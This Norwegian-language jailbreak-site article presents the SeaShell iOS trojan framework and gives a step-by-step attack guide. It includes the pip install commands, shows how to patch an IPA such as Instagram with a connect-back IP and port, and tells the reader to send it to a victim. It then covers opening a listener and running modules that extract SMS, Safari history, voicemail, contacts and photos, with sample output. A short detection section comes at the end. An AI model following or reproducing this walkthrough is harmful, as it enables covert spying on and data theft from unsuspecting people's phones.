ONE Jailbreak Ad
Forske Oppdatert 10 juni, 2025

SeaShell Trojan Horse for iOS

Promotion image of SeaShell article.

Mange brukere oppfatter CoreTrust-feilen, som brukes av TrollStore IPA-installasjonsprogrammet, som en praktisk funksjon som forenkler installasjon av apper og justeringer permanent uten begrensninger fra noen kilde på iPhones som kjører iOS 14, iOS 15 og iOS 16. Den har imidlertid et mørkere potensial fordi den kan utnyttes til å ta kontroll over iPhonen din i hemmelighet, noe som muliggjør skjult spionasje på enheten din uten din viten.

Hva er SeaShell?

SeaShell er et rammeverk utviklet for å oppdatere en IPA-fil for TrollStore eller Esign, noe som muliggjør injeksjon av skadelig programvare. Denne skadelige programvaren muliggjør ekstern tilkobling til den målrettede enheten, og forvandler den effektivt til en trojansk hest på et intetanende offers iPhone eller iPad. Ved å utnytte CoreTrust-feilen opererer SeaShell i smug, noe som utgjør betydelige sikkerhetsrisikoer for brukerne. Oppdatert IPA må installeres med TrollStore eller TrollStore 2.

iOS-rammeverket etter utnyttelse, kjent som SeaShell, gir brukere muligheten til å få ekstern tilgang til, manipulere og utvinne data fra målrettede enheter. Med sin allsidige arkitektur kan brukere enkelt utvikle tilpassede moduler skreddersydd for spesifikke oppgaver. SeaShell er imidlertid forhåndsutstyrt med flere viktige moduler designet for å utvinne sensitiv informasjon sømløst. I tillegg kan du oppdatere IPA-en med Trojan Horse.

For å starte prosessen er alt som kreves å generere en modifisert IPA-fil, som deretter kan installeres på målenheten via kanaler som TrollStore eller andre IPA-installasjonsprogrammer som kan omgå CoreTrust-restriksjoner. Når applikasjonen er installert, trenger målenheten bare å starte appen én gang og lukke den.

Skjermbilde av SeaShell Trojan Horse for iOS.

Blant funksjonalitetene tilbyr SeaShell moduler for å utvinne kritiske datapunkter. Brukere kan for eksempel bruke en modul til å hente detaljert kontaktinformasjon lagret i AddressBook.sqlitedb-filen. I tillegg kan brukere se systeminformasjon som enhet og installert iOS-fastvare, og laste ned bilder som er tilgjengelige på enheten eller i iCloud.

I tillegg forenkler SeaShell utforskningen av Safari-bokmerker og nettleserlogg, noe som gir brukerne mulighet til å dykke ned i det digitale fotavtrykket til den målrettede enheten. Denne funksjonen muliggjør utvinning og lagring av nettleserdata i et praktisk JSON-format for analyse.

Rammeverket inneholder dessuten moduler dedikert til å få tilgang til telefonsvarerdata fra voicemail.db-filen, som gir innsikt i kommunikasjonsmønstre og interaksjoner. I tillegg tilbyr SeaShell funksjonalitet for å laste ned eller vise SMS-data, slik at brukere kan overvåke og analysere tekstmeldingsutvekslinger, og dermed potensielt avsløre verdifull innsikt eller bevis.

Oppsummert tilbyr SeaShell ikke bare en fleksibel plattform for utvikling av tilpassede moduler, men inkluderer også et sett med forhåndsbygde verktøy som tar sikte på å trekke ut sensitiv informasjon fra iOS-enheter.

SeaShell kjører i Terminal-appen.

Merk: SeaShell krever at brukere laster ned en modifisert IPA-fil, sidelaster den på enheten med TrollStore og kjører den minst én gang for å kompromittere enheten.

Denne omfattende pakken med funksjoner understreker rammeverkets effektivitet i scenarier etter utnyttelse, og fremhever potensialet for både legitime og ondsinnede formål.

SeaShell kan skryte av en enormt kraftig funksjonalitet: muligheten til å koble seg til diverse applikasjoner, inkludert, men ikke begrenset til, Contacts.app. Gjennom denne funksjonaliteten får brukerne enestående kontroll, slik at de kan erstatte systemapper, fordype seg i appcontainere, legge til nye prosesser, oppdatere kjørbare filer, endre kjørbare tillatelser, laste opp oppdaterere og mer. Det er også et innebygd alternativ for å kontrollere offerets spiller med alternativer som stopp, spill av, neste osv.

Denne funksjonen lar brukere flytte den trojanske hesten for iOS til forskjellige apper, inkludert systemapper som Kalkulator, Kontakter osv.

Potensialet for utnyttelse kjenner ingen grenser, og SeaShell tilbyr et bredt spekter av muligheter for sofistikerte angrep og manipulasjoner. SeaShell utnytter de formidable egenskapene til en avansert nyttelast kjent som Pwny, kjent for sin overflod av funksjoner designet for å legge til rette for intrikate utnyttelsestaktikker. Med Pwny i kjernen tilbyr SeaShell brukerne et robust rammeverk for å utføre sofistikerte manøvrer innen cybersikkerhet.

Slik installerer du SeaShell

SeaShell er et Python-skript som enkelt kan installeres via pip-pakkebehandleren. For å sette opp SeaShell Framework, skriver du ganske enkelt inn følgende kommando i terminalen din:

 pip3 install git+https://github.com/EntySec/SeaShell

Skjermbilde av SeaShell-installasjonsprosessen i terminalappen.

Pwny er en implementering av en avansert nyttelast skrevet i ren C og designet for portabilitet og utvidbarhet for iOS-enheter. Bruk følgende kommando for å installere pwny:

 pip3 install git+https://github.com/EntySec/HatSploit

Slik bruker du SeaShell Framework

SeaShell bruker sin applikasjonspakke som består av en enkel kjørbar fil sammen med en annen kjørbar fil som er ansvarlig for å starte Pwny-nyttelasten. Dette verktøyet lar brukere endre enhver IPA-fil, for eksempel ved å oppdatere justert Instagram IPA med den trojanske hesten. Det er også et alternativ å bygge en IPA-fil som inneholder skadevaren med et falskt navn og ikon.

Trinn 1. Åpne terminalappen og kjør seashell-kommandoen for å kjøre rammeverket.

 seashell

Trinn 2. Oppdater en IPA-fil og oppgi IP-adressen og porten din for tilkoblingen.

(seashell)> ipa patch Instagram.ipa 
Host to connect back: 192.168.0.1 
Port to connect back: 8888 
IPA at Instagram.ipa patched.

Trinn 3. Send IPA-en til offeret for installasjon via TrollStore.

Trinn 4. Åpne lytteren på datamaskinen din og vent på tilkoblingen.

 (seashell)> listener on 0.0.0.0:8888

Trinn 5. Etter vellykket tilkobling, kjør moduler, f.eks. safari_history, player, sysinfo, sms, devices, ipa, voicemail, photos, safari_bookmarks, contacts osv.

 pwny:/ root# safari_history History.db |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s History.db-wal |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s [*] Parsing history database... History: Date URL ---- --- 2024-02-28 09:35:57 https://onejailbreak.com pwny:/ root#

For å gi tilgang til SMS-data kan du liste opp chattene som finnes i SMS-appen ved å bruke kommandoen sms -l, eller hente ut chatteloggen med en bestemt kontakt med sms .

 pwny:/ root# sms 123456789 sms.db |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s sms.db-wal |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s [*] Parsing SMS for 123456789... Sms (11111111111): ID Date Status Text -- ---- ------ ---- 1 2024-02-28 11:01:21 Sent Vist ONEJailbreak.com pwny:/ root#

Slik oppdager du SeaShell Trojan Horse

For å redusere risikoen for å bli offer for angrep via SeaShell-rammeverket kan du følge noen forslag til hvordan du kan oppdage standardkonfigurasjonen av SeaShell-patchede IPA-filer. Prosjektet er imidlertid åpen kildekode og kan enkelt endres for å endre verdiene til tilpassede.

  1. Pakk ut IPA-filen du har tenkt å installere.
  2. Undersøk apppakken for en kjørbar fil kalt «mussel», som fungerer som en representasjon av Pwny-nyttelasten.
  3. Undersøk Info.plist-filen og se etter «CFBundleBase64Hash», som inneholder et vertspar kodet med base64 (:).
  4. Bekreft hash-summen til filen for å sikre dens integritet før du fortsetter med installasjonen.
Author Photo
Skrevet av
Kuba Pawlak

Kuba har over 20 års erfaring innen journalistikk, med fokus på jailbreak siden 2012. Han har intervjuet fagfolk fra diverse selskaper. Ved siden av journalistikk spesialiserer Kuba seg på videoredigering og droneflyging. Han studerte IT på universitetet før han startet forfatterkarrieren.

Legg inn en kommentar

Siste innlegg